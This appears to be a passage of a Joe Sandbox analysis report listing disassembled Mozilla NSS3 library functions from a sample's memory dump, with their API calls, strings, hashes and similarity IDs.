Instruction Fuzzy Hash: 9F52F4B1E102559BEF119F64D9067AE7BF4BF09348F184028ED09E7741EB31D998CBA2

Function 6CA8EA80 Relevance: 107.5, APIs: 49, Strings: 12, Instructions: 735stringmemoryCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(00000000), ref: 6CA8EAB1

Part of subcall function 6CB49090: TlsGetValue.KERNEL32 ref: 6CB490AB
Part of subcall function 6CB49090: TlsGetValue.KERNEL32 ref: 6CB490C9
Part of subcall function 6CB49090: EnterCriticalSection.KERNEL32 ref: 6CB490E5
Part of subcall function 6CB49090: TlsGetValue.KERNEL32 ref: 6CB49116
Part of subcall function 6CB49090: LeaveCriticalSection.KERNEL32 ref: 6CB4913F

PR_ExitMonitor.NSS3 ref: 6CA8EAC5

Part of subcall function 6CB49440: TlsGetValue.KERNEL32 ref: 6CB4945B
Part of subcall function 6CB49440: TlsGetValue.KERNEL32 ref: 6CB49479
Part of subcall function 6CB49440: EnterCriticalSection.KERNEL32 ref: 6CB49495
Part of subcall function 6CB49440: TlsGetValue.KERNEL32 ref: 6CB494E4
Part of subcall function 6CB49440: TlsGetValue.KERNEL32 ref: 6CB49532
Part of subcall function 6CB49440: LeaveCriticalSection.KERNEL32 ref: 6CB4955D

PR_SetError.NSS3(FFFFE09A,00000000), ref: 6CA8EBAF
PR_Socket.NSS3(00000002,00000001,00000000), ref: 6CA8EBF8
PR_StringToNetAddr.NSS3(?,?), ref: 6CA8EC20
PORT_Alloc_Util.NSS3(00000800), ref: 6CA8EC39
PR_GetHostByName.NSS3(?,00000000,00000800,?), ref: 6CA8EC5A
PR_EnumerateHostEnt.NSS3(00000000,?,?,?), ref: 6CA8EC85
free.MOZGLUE(?), ref: 6CA8ECB6
PR_SetError.NSS3(FFFFE078,00000000), ref: 6CA8ECCF
free.MOZGLUE(?), ref: 6CA8ED10
free.MOZGLUE(?), ref: 6CA8ED26
PR_InitializeNetAddr.NSS3(00000000,?,?), ref: 6CA8ED35
PR_snprintf.NSS3(?,00000010,:%d,?), ref: 6CA8ED7F
PR_smprintf.NSS3(POST %s HTTP/1.0Host: %s%sContent-Type: application/ocsp-requestContent-Length: %u,?,?,00000000,?), ref: 6CA8EDAB
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA8EDBE
free.MOZGLUE(00000000), ref: 6CA8EE9B
PR_smprintf.NSS3(GET %s HTTP/1.0Host: %s%s,?,?,00000000), ref: 6CA8EEB1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA8EEC0
free.MOZGLUE(00000000), ref: 6CA8EEE2
free.MOZGLUE(00000000), ref: 6CA8EEF2
free.MOZGLUE(?), ref: 6CA8EF15
free.MOZGLUE(?), ref: 6CA8EF27
realloc.MOZGLUE(00000000,-00000401), ref: 6CA8EF5C

Part of subcall function 6CA8E910: PL_strncasecmp.NSS3(?,http://,00000007), ref: 6CA8E93B
Part of subcall function 6CA8E910: PR_SetError.NSS3(FFFFE075,00000000), ref: 6CA8E94E

strstr.VCRUNTIME140(-000000F8,), ref: 6CA8F00C
strstr.VCRUNTIME140(00000000,6CBD010D), ref: 6CA8F03F
strchr.VCRUNTIME140(00000000,00000020), ref: 6CA8F055
PL_strncasecmp.NSS3(00000000,HTTP/,00000005), ref: 6CA8F06D
free.MOZGLUE(00000000), ref: 6CA8F07A
PR_SetError.NSS3(FFFFE077,00000000), ref: 6CA8F08A
strchr.VCRUNTIME140(?,00000020), ref: 6CA8F0AC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,200), ref: 6CA8F0C4
strchr.VCRUNTIME140(?,0000003A), ref: 6CA8F0FA
strstr.VCRUNTIME140(-00000002,6CBD010D), ref: 6CA8F124
PL_strcasecmp.NSS3(?,content-type), ref: 6CA8F13D
PL_strcasecmp.NSS3(?,content-length), ref: 6CA8F14F
atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 6CA8F15F
PL_strcasecmp.NSS3(?,application/ocsp-response), ref: 6CA8F1A0
memcpy.VCRUNTIME140(00000000,?), ref: 6CA8F1CD
PR_SetError.NSS3(FFFFE077,00000000), ref: 6CA8F231
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000), ref: 6CA8F387
memcpy.VCRUNTIME140(?,00000000,00000000), ref: 6CA8F39C
free.MOZGLUE(00000000), ref: 6CA8F3A5
free.MOZGLUE(00000000), ref: 6CA8F3B1

Part of subcall function 6CA70F00: PR_GetPageSize.NSS3(6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F1B
Part of subcall function 6CA70F00: PR_NewLogModule.NSS3(clock,6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F25

Strings

200, xrefs: 6CA8F0BB
application/ocsp-response, xrefs: 6CA8F19A
:%d, xrefs: 6CA8ED73
HTTP/, xrefs: 6CA8F067
GET, xrefs: 6CA8EB53
application/ocsp-request, xrefs: 6CA8EE25
http, xrefs: 6CA8EB86
content-length, xrefs: 6CA8F149
content-type, xrefs: 6CA8F137
GET %s HTTP/1.0Host: %s%s, xrefs: 6CA8EEAC
POST, xrefs: 6CA8EB58, 6CA8EB81
POST %s HTTP/1.0Host: %s%sContent-Type: application/ocsp-requestContent-Length: %u, xrefs: 6CA8EDA6

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: free$Value$Error$CriticalSection$EnterL_strcasecmpstrchrstrstr$AddrHostL_strncasecmpLeaveMonitorR_smprintfUtilmemcpystrlen$AllocAlloc_EnumerateExitInitializeItem_ModuleNamePageR_snprintfSizeSocketStringatoireallocstrcmp
String ID: 200$:%d$GET$GET %s HTTP/1.0Host: %s%s$HTTP/$POST$POST %s HTTP/1.0Host: %s%sContent-Type: application/ocsp-requestContent-Length: %u$application/ocsp-request$application/ocsp-response$content-length$content-type$http
API String ID: 3957390022-1324771758
Opcode ID: 538cb30734622471bfeb304f010bd98a72fe5fd5652905624585f118b63e0201
Instruction ID: 721d4c0a30d402e73dc808bdafea8755e3964e5db6f71fa2709b43076b94c838
Opcode Fuzzy Hash: 538cb30734622471bfeb304f010bd98a72fe5fd5652905624585f118b63e0201
Instruction Fuzzy Hash: 0942E075A0A342AFEB009F64DC85B5B77E8AF45348F08483CF94993751E735E948CBA2

Function 6CA8CA70 Relevance: 84.8, APIs: 56, Instructions: 849threadtimememoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CA8CB45
PORT_ZAlloc_Util.NSS3(00000040), ref: 6CA8CB5B
CERT_GetConstrainedCertificateNames.NSS3(?,00000010,?), ref: 6CA8CBEB
realloc.MOZGLUE(?,00000000), ref: 6CA8CC3B
PR_SetError.NSS3(FFFFE029,00000000), ref: 6CA8CD25
PR_GetCurrentThread.NSS3 ref: 6CA8CD35
CERT_FindCertIssuer.NSS3(?,00000001,?,00000001), ref: 6CA8CD74
CERT_CheckCertValidTimes.NSS3(?,00000001,?,00000000), ref: 6CA8CD9D
PR_GetCurrentThread.NSS3 ref: 6CA8CDBA
PR_SetError.NSS3(FFFFE01E,00000000), ref: 6CA8CDD2
PR_GetCurrentThread.NSS3 ref: 6CA8CDE9
PR_SetError.NSS3(FFFFE024,00000000), ref: 6CA8CE7C
PR_GetCurrentThread.NSS3 ref: 6CA8CE93
PR_SetError.NSS3(FFFFE025,00000000), ref: 6CA8CEC1
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CA8CF8F
memcmp.VCRUNTIME140(?,6CBA96B4,00000048), ref: 6CA8CFC8
PR_GetCurrentThread.NSS3 ref: 6CA8D071
CERT_GetCertTrust.NSS3(?,?), ref: 6CA8D091
PR_SetError.NSS3(FFFFE024,00000000), ref: 6CA8D0C6
PR_GetCurrentThread.NSS3 ref: 6CA8D0DD
PR_SetError.NSS3(FFFFE05A,00000000), ref: 6CA8D116
PR_GetCurrentThread.NSS3 ref: 6CA8D131
PR_SetError.NSS3(FFFFE014,00000000), ref: 6CA8D1D9
PR_SetError.NSS3(FFFFE014,00000000), ref: 6CA8D225
CERT_DestroyCertificate.NSS3(?), ref: 6CA8D410
PR_SetError.NSS3(FFFFE0B6,00000000), ref: 6CA8D44E
PR_GetCurrentThread.NSS3 ref: 6CA8D45E
PR_GetCurrentThread.NSS3 ref: 6CA8D1EC

Part of subcall function 6CA8C9A0: PORT_ArenaAlloc_Util.NSS3(00000000,00000018,?,00000001,00000000,?,6CA8D864,?,00000000,?), ref: 6CA8C9AE

PR_SetError.NSS3(FFFFE014,00000000), ref: 6CA8D285
PR_GetCurrentThread.NSS3 ref: 6CA8D298
PR_SetError.NSS3(FFFFE014,00000000), ref: 6CA8D2D7
PR_SetError.NSS3(FFFFE014,00000000), ref: 6CA8D330
PR_GetCurrentThread.NSS3 ref: 6CA8D34C
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6CA8D392
CERT_DestroyCertificate.NSS3(?), ref: 6CA8D3BC
PR_SetError.NSS3(FFFFE00D,00000000), ref: 6CA8D3DF
PR_GetCurrentThread.NSS3 ref: 6CA8D3EE
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6CA8CE12

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

PR_GetCurrentThread.NSS3 ref: 6CA8CE22
PR_GetCurrentThread.NSS3 ref: 6CA8CED8
memcmp.VCRUNTIME140(?,6CBA96FC,00000048), ref: 6CA8CFDC
CERT_GetCertTimes.NSS3(?,?,?), ref: 6CA8CFF6
PR_GetCurrentThread.NSS3 ref: 6CA8CDFD

Part of subcall function 6CB49BF0: TlsGetValue.KERNEL32(?,?,?,6CB90A75), ref: 6CB49C07

PR_GetCurrentThread.NSS3 ref: 6CA8CE52
PR_SetError.NSS3(FFFFE014,00000000), ref: 6CA8D4C4
PR_SetError.NSS3(FFFFE014,00000000), ref: 6CA8D4E2
PR_GetCurrentThread.NSS3 ref: 6CA8D4EA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA8D515
PR_SetError.NSS3(FFFFE014,00000000), ref: 6CA8D52C
PR_GetCurrentThread.NSS3 ref: 6CA8D540
free.MOZGLUE(?), ref: 6CA8D567
CERT_DestroyCertificate.NSS3(00000000), ref: 6CA8D575
CERT_DestroyCertificate.NSS3(?), ref: 6CA8D584
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA8D592

Part of subcall function 6CAA06A0: TlsGetValue.KERNEL32 ref: 6CAA06C2
Part of subcall function 6CAA06A0: EnterCriticalSection.KERNEL32(?), ref: 6CAA06D6
Part of subcall function 6CAA06A0: PR_Unlock.NSS3 ref: 6CAA06EB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CurrentErrorThread$CertificateDestroyUtil$Cert$Value$Alloc_Arena_Timesmemcmp$ArenaCheckConstrainedCriticalEnterEqual_FindFreeIssuerItemsNamesPublicSectionTrustUnlockValidfreerealloc
String ID:
API String ID: 3754541784-0
Opcode ID: a4ed92783f502ecc87cf765f179b0e9110734c4b6df93cd0b1a22dfc8bd2a5aa
Instruction ID: ae94ecdad8c027334dc080f33ea6ff769e22c6c0c8c8279a9e66a8f1fa5fd6f9
Opcode Fuzzy Hash: a4ed92783f502ecc87cf765f179b0e9110734c4b6df93cd0b1a22dfc8bd2a5aa
Instruction Fuzzy Hash: 0A522571E0A3029BE7009F64DC40B5F77B5AF8431CF184629F95997BA1E731E889CB92

Function 6CAD09B0 Relevance: 66.8, APIs: 44, Instructions: 817memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6CAD1AD3), ref: 6CAD09D5
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6CAD1AD3), ref: 6CAD09E9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAD0A18
PR_SetError.NSS3(00000000,00000000), ref: 6CAD0A30
memcpy.VCRUNTIME140(?,00000000,00000020,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CAD0CC9
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CAD0D05
EnterCriticalSection.KERNEL32(?), ref: 6CAD0D19
PR_Unlock.NSS3(?), ref: 6CAD0D36
free.MOZGLUE(?), ref: 6CAD0D75
TlsGetValue.KERNEL32 ref: 6CAD0DA1
EnterCriticalSection.KERNEL32(?), ref: 6CAD0DB5
PR_Unlock.NSS3(?), ref: 6CAD0DEB
PORT_Alloc_Util.NSS3(?), ref: 6CAD0DFF
PR_Unlock.NSS3(?), ref: 6CAD0E37
free.MOZGLUE(?), ref: 6CAD0E4E
PR_SetError.NSS3(00000000,00000000), ref: 6CAD0E6A
memset.VCRUNTIME140(?,00000000,00000100), ref: 6CAD0E9A
TlsGetValue.KERNEL32 ref: 6CAD0F23
EnterCriticalSection.KERNEL32(?), ref: 6CAD0F37
PR_SetError.NSS3(00000000,00000000), ref: 6CAD0FC7

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

PR_Unlock.NSS3(?), ref: 6CAD0FDE
TlsGetValue.KERNEL32 ref: 6CAD0FFA
EnterCriticalSection.KERNEL32(?), ref: 6CAD100E
PR_Unlock.NSS3(?), ref: 6CAD1050
PR_Unlock.NSS3(?), ref: 6CAD1073
TlsGetValue.KERNEL32 ref: 6CAD1087
EnterCriticalSection.KERNEL32(?), ref: 6CAD109B
PR_Unlock.NSS3(?), ref: 6CAD10B8
free.MOZGLUE(?), ref: 6CAD1113
PORT_Alloc_Util.NSS3(?), ref: 6CAD1151
free.MOZGLUE(?), ref: 6CAD11AB
TlsGetValue.KERNEL32 ref: 6CAD1296
EnterCriticalSection.KERNEL32(?), ref: 6CAD12AB
PR_Unlock.NSS3(?), ref: 6CAD12D9
TlsGetValue.KERNEL32 ref: 6CAD12F4
EnterCriticalSection.KERNEL32(?), ref: 6CAD130C
PR_Unlock.NSS3(?), ref: 6CAD1340
TlsGetValue.KERNEL32 ref: 6CAD1354
EnterCriticalSection.KERNEL32(?), ref: 6CAD136C
PR_Unlock.NSS3(?), ref: 6CAD13A3
TlsGetValue.KERNEL32 ref: 6CAD13BA
EnterCriticalSection.KERNEL32(?), ref: 6CAD13CF
PR_Unlock.NSS3(?), ref: 6CAD13FB

Part of subcall function 6CB2DD70: TlsGetValue.KERNEL32 ref: 6CB2DD8C
Part of subcall function 6CB2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB2DDB4

PR_SetError.NSS3(FFFFE040,00000000), ref: 6CAD141E

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalSection$Enter$Errorfree$Alloc_Utilcalloc$Leavememcpymemset
String ID:
API String ID: 3136013483-0
Opcode ID: cabcfc3ace8aec008887b4cdeaace18023f47aa2b18ce7d1346b0d6060fd8d4a
Instruction ID: 7d9019d2288e8e86f1785c996915c4b20674484f3f05e03ad1956a1bea0e71d4
Opcode Fuzzy Hash: cabcfc3ace8aec008887b4cdeaace18023f47aa2b18ce7d1346b0d6060fd8d4a
Instruction Fuzzy Hash: 5172C0B1D002549FEF109F64D8887AA3BB4BF09328F1E01B9DD099B752E734E995CB91

Function 6CAE4840 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 351
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6CAC601B,?,00000000,?), ref: 6CAE486F
PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6CAE48A8
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6CAE48BE
NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6CAE48DE
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6CAE48F5
NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6CAE490A
PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6CAE4919
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6CAE493F
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAE4970
PORT_Alloc_Util.NSS3(00000001), ref: 6CAE49A0
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6CAE49AD
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAE49D4
NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6CAE49F4
NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6CAE4A10
NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6CAE4A27
NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6CAE4A3D
NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6CAE4A4F
PL_strcasecmp.NSS3(00000000,every), ref: 6CAE4A6C
PL_strcasecmp.NSS3(00000000,timeout), ref: 6CAE4A81
free.MOZGLUE(00000000), ref: 6CAE4AAB
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6CAE4ABE
PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6CAE4ADC
free.MOZGLUE(00000000), ref: 6CAE4B17
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6CAE4B33

Part of subcall function 6CAE4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAE413D
Part of subcall function 6CAE4120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAE4162
Part of subcall function 6CAE4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAE416B
Part of subcall function 6CAE4120: PL_strncasecmp.NSS3(6CAE4232,?,00000001), ref: 6CAE4187
Part of subcall function 6CAE4120: NSSUTIL_ArgSkipParameter.NSS3(6CAE4232), ref: 6CAE41A0
Part of subcall function 6CAE4120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAE41B4
Part of subcall function 6CAE4120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6CAE41CC
Part of subcall function 6CAE4120: NSSUTIL_ArgFetchValue.NSS3(6CAE4232,?), ref: 6CAE4203

PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6CAE4B53
free.MOZGLUE(00000000), ref: 6CAE4B94
free.MOZGLUE(?), ref: 6CAE4BA7
free.MOZGLUE(00000000), ref: 6CAE4BB7
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAE4BC8

Strings

slotFlags, xrefs: 6CAE4A22
rootFlags, xrefs: 6CAE4AB9, 6CAE4B2E
askpw, xrefs: 6CAE4A4A
hasRootTrust, xrefs: 6CAE4B4D
every, xrefs: 6CAE4A66
timeout, xrefs: 6CAE4A38, 6CAE4A7B
hasRootCerts, xrefs: 6CAE4AD6

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
API String ID: 3791087267-1256704202
Opcode ID: 1bf7a35ffa9e6a7bb6ac2b70305f5297c3446d86c9144d71216722729ebd665d
Instruction ID: 9cfc22e24b37a42f5fe4e4d82d7a2d4832ae7cae85adcd104b95c33588206cb6
Opcode Fuzzy Hash: 1bf7a35ffa9e6a7bb6ac2b70305f5297c3446d86c9144d71216722729ebd665d
Instruction Fuzzy Hash: 1DC10874E052569BEB109FE89C50BAE7BBCAF0E308F180069EC55A7701E731E954D7E1

Function 6CAA6D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6CBAA8EC,0000006C), ref: 6CAA6DC6
memcpy.VCRUNTIME140(?,6CBAA958,0000006C), ref: 6CAA6DDB
memcpy.VCRUNTIME140(?,6CBAA9C4,00000078), ref: 6CAA6DF1
memcpy.VCRUNTIME140(?,6CBAAA3C,0000006C), ref: 6CAA6E06
memcpy.VCRUNTIME140(?,6CBAAAA8,00000060), ref: 6CAA6E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAA6E38

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6CAA6E76
TlsGetValue.KERNEL32 ref: 6CAA726F
EnterCriticalSection.KERNEL32(?), ref: 6CAA7283

Strings

!, xrefs: 6CAA7123

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: 08007b237ef4f601de521d134e3fb460112a8fdf5a7d3f94b5e9fc0cef565557
Instruction ID: fae3c3e0cc2ce8aada74148abc00661afb116d7aa3b227cef8e9d9a5e9d0024c
Opcode Fuzzy Hash: 08007b237ef4f601de521d134e3fb460112a8fdf5a7d3f94b5e9fc0cef565557
Instruction Fuzzy Hash: 40728D75E052189FDF60CF68CC88B9ABBB5AF48304F1441A9D80DA7711EB31AAC5CF91

Function 6CAC8A30 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 393memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAC8A58

Part of subcall function 6CAE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA887ED,00000800,6CA7EF74,00000000), ref: 6CAE1000
Part of subcall function 6CAE0FF0: PR_NewLock.NSS3(?,00000800,6CA7EF74,00000000), ref: 6CAE1016
Part of subcall function 6CAE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA887ED,00000008,?,00000800,6CA7EF74,00000000), ref: 6CAE102B

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAC8AC6
PORT_ArenaAlloc_Util.NSS3(00000000,00000044), ref: 6CAC8ADF
SECITEM_CopyItem_Util.NSS3(00000000,00000004,?), ref: 6CAC8B19
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CAC8B2D
PK11_GenerateRandom.NSS3(00000000,00000010), ref: 6CAC8B49
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000010,00000000), ref: 6CAC8B61
SEC_ASN1EncodeInteger_Util.NSS3(00000000,0000001C), ref: 6CAC8B83
SECOID_SetAlgorithmID_Util.NSS3(00000000,-0000002C,?,00000000), ref: 6CAC8BA0
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CAC8BF0
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6CAC8BF9
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAC8C13
HASH_ResultLenByOidTag.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAC8C3A
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAC8CA7
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CAC8CC4
PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6CAC8D12
PORT_FreeArena_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CAC8D20
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAC8D40
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAC8D99
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CAC8DBF
PORT_ArenaAlloc_Util.NSS3(00000123,00000018), ref: 6CAC8DD5
SEC_ASN1EncodeItem_Util.NSS3(?,?,00000000,6CBAD864), ref: 6CAC8E39

Part of subcall function 6CADF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6CADF0C8
